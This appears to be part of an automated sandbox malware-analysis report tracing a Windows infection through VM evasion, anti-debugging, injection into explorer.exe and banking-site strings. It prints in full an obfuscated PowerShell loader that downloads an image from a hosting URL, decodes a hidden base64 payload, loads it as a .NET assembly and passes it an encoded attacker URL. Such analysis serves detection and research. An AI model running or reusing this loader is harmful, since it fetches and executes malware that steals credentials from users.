            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\uahuajd | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep,18_2_00163862
            Source: C:\Windows\SysWOW64\explorer.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep graph_20-884
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | API/Special instruction interceptor: Address: 7FFB2CECE814
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | API/Special instruction interceptor: Address: 7FFB2CECD584
            Source: C:\Users\user\AppData\Roaming\uahuajd | Memory allocated: 770000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\uahuajd | Memory allocated: 2470000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\uahuajd | Memory allocated: 4470000 memory reserve | memory write watch
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 18_2_001616C7 GetCurrentProcessId,GetCurrentThreadId,CreateToolhelp32Snapshot,Thread32First,OpenThread,SuspendThread,ResumeThread,CloseHandle,Thread32Next,CloseHandle,18_2_001616C7
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\uahuajd | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3872
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5977
            Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 444
            Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 3479
            Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 906
            Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 3301
            Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 770
            Source: C:\Windows\SysWOW64\explorer.exe | Window / User API: threadDelayed 381
            Source: C:\Windows\SysWOW64\explorer.exe | Window / User API: threadDelayed 547
            Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 364
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4732 | Thread sleep time: -15679732462653109s >= -30000s
            Source: C:\Windows\explorer.exe TID: 3260 | Thread sleep time: -347900s >= -30000s
            Source: C:\Windows\explorer.exe TID: 1860 | Thread sleep time: -90600s >= -30000s
            Source: C:\Windows\explorer.exe TID: 3260 | Thread sleep time: -330100s >= -30000s
            Source: C:\Users\user\AppData\Roaming\uahuajd TID: 6296 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exe TID: 3924 | Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exe TID: 4048 | Thread sleep count: 381 > 30
            Source: C:\Windows\SysWOW64\explorer.exe TID: 4048 | Thread sleep time: -381000s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exe TID: 6196 | Thread sleep count: 547 > 30
            Source: C:\Windows\SysWOW64\explorer.exe TID: 6196 | Thread sleep time: -547000s >= -30000s
            Source: C:\Windows\explorer.exe TID: 3944 | Thread sleep count: 364 > 30
            Source: C:\Windows\explorer.exe TID: 3944 | Thread sleep time: -364000s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exe TID: 3968 | Thread sleep count: 71 > 30
            Source: C:\Windows\SysWOW64\explorer.exe TID: 3968 | Thread sleep time: -71000s >= -30000s
            Source: C:\Windows\explorer.exe TID: 5528 | Thread sleep count: 148 > 30
            Source: C:\Windows\explorer.exe TID: 5528 | Thread sleep time: -148000s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exe | Last function: Thread delayed
            Source: C:\Windows\explorer.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00A02B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,14_2_00A02B15
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00A01D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,14_2_00A01D4A
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00A03ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,14_2_00A03ED9
            Source: C:\Windows\explorer.exe | Code function: 16_2_009B30A8 FindFirstFileW,FindNextFileW,FindClose,16_2_009B30A8
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 17_2_0080255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose,17_2_0080255C
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 18_2_001615BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,18_2_001615BE
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 18_2_001614D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,18_2_001614D8
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 18_2_001613FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,18_2_001613FE
            Source: C:\Windows\explorer.exe | Code function: 19_2_009E1EB4 FindFirstFileW,FindNextFileW,FindClose,19_2_009E1EB4
            Source: C:\Windows\explorer.exe | Code function: 19_2_009E1DB0 FindFirstFileW,FindNextFileW,FindClose,19_2_009E1DB0
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00A06512 GetSystemInfo,14_2_00A06512
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
            Source: explorer.exe, 0000000C.00000000.1503056802.0000000000C74000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000I
            Source: 53B.tmp.14.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
            Source: 53B.tmp.14.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
            Source: 53B.tmp.14.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
            Source: explorer.exe, 0000000C.00000000.1506729663.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
            Source: 53B.tmp.14.dr | Binary or memory string: outlook.office.comVMware20,11696492231s
            Source: 53B.tmp.14.dr | Binary or memory string: AMC password management pageVMware20,11696492231
            Source: 53B.tmp.14.dr | Binary or memory string: interactivebrokers.comVMware20,11696492231
            Source: 53B.tmp.14.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
            Source: explorer.exe, 0000000C.00000000.1506729663.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.1757266577.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.1757266577.0000000000D3A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: 53B.tmp.14.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
            Source: 53B.tmp.14.dr | Binary or memory string: outlook.office365.comVMware20,11696492231t
            Source: explorer.exe, 0000000C.00000000.1503645926.0000000003249000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
            Source: 53B.tmp.14.dr | Binary or memory string: discord.comVMware20,11696492231f
            Source: explorer.exe, 0000000E.00000002.1757266577.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWocal Storage\*.*B
            Source: explorer.exe, 0000000C.00000000.1506729663.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
            Source: 53B.tmp.14.dr | Binary or memory string: global block list test formVMware20,11696492231
            Source: explorer.exe, 0000000C.00000000.1506729663.0000000009052000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000}io
            Source: explorer.exe, 0000000C.00000000.1506729663.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000I}~"
            Source: 53B.tmp.14.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
            Source: explorer.exe, 0000000C.00000000.1506729663.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00
            Source: explorer.exe, 0000000E.00000003.1738110753.0000000000D20000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696492231|
            Source: 53B.tmp.14.dr | Binary or memory string: bankofamerica.comVMware20,11696492231x
            Source: 53B.tmp.14.dr | Binary or memory string: tasks.office.comVMware20,11696492231o
            Source: explorer.exe, 0000000C.00000000.1503645926.0000000003249000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware20,1
            Source: 53B.tmp.14.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
            Source: explorer.exe, 0000000C.00000000.1504447706.0000000007306000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: 53B.tmp.14.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
            Source: explorer.exe, 0000000C.00000000.1506729663.0000000008F27000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWT`
            Source: explorer.exe, 0000000C.00000000.1503645926.0000000003249000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SVGA IIES1371
            Source: explorer.exe, 0000000C.00000000.1503645926.0000000003249000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware Virtual RAM
            Source: 53B.tmp.14.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
            Source: explorer.exe, 0000000C.00000000.1503645926.0000000003249000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
            Source: explorer.exe, 0000000C.00000000.1506729663.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: 53B.tmp.14.dr | Binary or memory string: turbotax.intuit.comVMware20,11696492231t
            Source: 53B.tmp.14.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
            Source: explorer.exe, 0000000C.00000000.1503056802.0000000000C74000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: 53B.tmp.14.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
            Source: 53B.tmp.14.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
            Source: 53B.tmp.14.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
            Source: explorer.exe, 0000000C.00000000.1503645926.0000000003249000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.
            Source: 53B.tmp.14.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
            Source: explorer.exe, 0000000C.00000000.1503645926.0000000003249000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
            Source: 53B.tmp.14.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
            Source: 53B.tmp.14.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
            Source: explorer.exe, 0000000C.00000000.1506729663.0000000009013000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: explorer.exe, 0000000C.00000000.1503645926.0000000003249000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SVGA II
            Source: 53B.tmp.14.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
            Source: explorer.exe, 0000000C.00000000.1504447706.0000000007306000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: War&Prod_VMware_xU1
            Source: 53B.tmp.14.dr | Binary or memory string: dev.azure.comVMware20,11696492231j
            Source: 53B.tmp.14.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
            Source: 53B.tmp.14.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
            Source: explorer.exe, 0000000C.00000000.1506729663.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc5
            Source: explorer.exe, 0000000C.00000000.1503645926.0000000003249000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
            Source: explorer.exe, 0000000C.00000000.1506729663.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMWare
            Source: explorer.exe, 0000000C.00000000.1506729663.0000000009052000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000'
            Source: 53B.tmp.14.dr | Binary or memory string: ms.portal.azure.comVMware20,11696492231
            Source: explorer.exe, 0000000C.00000000.1503056802.0000000000C74000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
            Source: 53B.tmp.14.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | System information queried: ModuleInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

            Anti Debugging

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | System information queried: CodeIntegrityInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Process queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 11_2_00402920 LdrLoadDll,11_2_00402920
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 18_2_001616C7 GetCurrentProcessId,GetCurrentThreadId,CreateToolhelp32Snapshot,Thread32First,OpenThread,SuspendThread,ResumeThread,CloseHandle,Thread32Next,CloseHandle,18_2_001616C7
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00A02198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,14_2_00A02198
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00A01000 GetProcessHeap,RtlAllocateHeap,14_2_00A01000
            Source: C:\Users\user\AppData\Roaming\uahuajd | Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\explorer.exe | File created: uahuajd.12.dr
            Source: C:\Windows\SysWOW64\explorer.exe | Network Connect: 46.173.214.14 80
            Source: Yara match | File source: amsi64_5128.amsi.csv, type: OTHER
            Source: Yara match | File source: Process Memory Space: wscript.exe PID: 6292, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5128, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Thread created: C:\Windows\explorer.exe EIP: 3131960
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\explorer.exe | Memory written: PID: 2060 base: 10879C0 value: 90
            Source: C:\Windows\explorer.exe | Memory written: PID: 6080 base: 7FF710072D10 value: 90
            Source: C:\Windows\explorer.exe | Memory written: PID: 4656 base: 10879C0 value: 90
            Source: C:\Windows\explorer.exe | Memory written: PID: 7140 base: 10879C0 value: 90
            Source: C:\Windows\explorer.exe | Memory written: PID: 2508 base: 7FF710072D10 value: 90
            Source: C:\Windows\explorer.exe | Memory written: PID: 2908 base: 10879C0 value: 90
            Source: C:\Windows\explorer.exe | Memory written: PID: 3988 base: 7FF710072D10 value: 90
            Source: C:\Windows\explorer.exe | Memory written: PID: 3916 base: 10879C0 value: 90
            Source: C:\Windows\explorer.exe | Memory written: PID: 5144 base: 7FF710072D10 value: 90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: B19008
            Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: 10879C0
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe 26_2_001B1016
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe 26_2_001B10A5
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };$originaltext = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredtext = $originaltext -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = new-object system.net.webclient;$googleability = $unroyalist.downloaddata($vicegerents);$tuillette = [system.text.encoding]::utf8.getstring($googleability);$marischal = '<<base64_start>>';$botchedly = '<<base64_end>>';$uscher = $tuillette.indexof($marischal);$diffamed = $tuillette.indexof($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.length;$tetri = $diffamed - $uscher;$engagement = $tuillette.substring($uscher, $tetri);$admixture = -join ($engagement.tochararray() | foreach-object { $_ })[-1..-($engagement.length)];$satisfy = [system.convert]::frombase64string($admixture);$rivets = [system.reflection.assembly]::load($satisfy);$subtractions = [dnlib.io.home].getmethod('vai');$subtractions.invoke($null, @($restoredtext, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','taskname'));if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };"
            Source: explorer.exe, 0000000C.00000000.1504332665.0000000004880000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1503363257.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.1506729663.0000000009013000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 0000000C.00000000.1503363257.0000000001441000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: explorer.exe, 0000000C.00000000.1503363257.0000000001441000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: ?Program Manager
            Source: explorer.exe, 0000000C.00000000.1503056802.0000000000C59000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 1Progman
            Source: explorer.exe, 0000000C.00000000.1503363257.0000000001441000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00A555EB cpuid 14_2_00A555EB
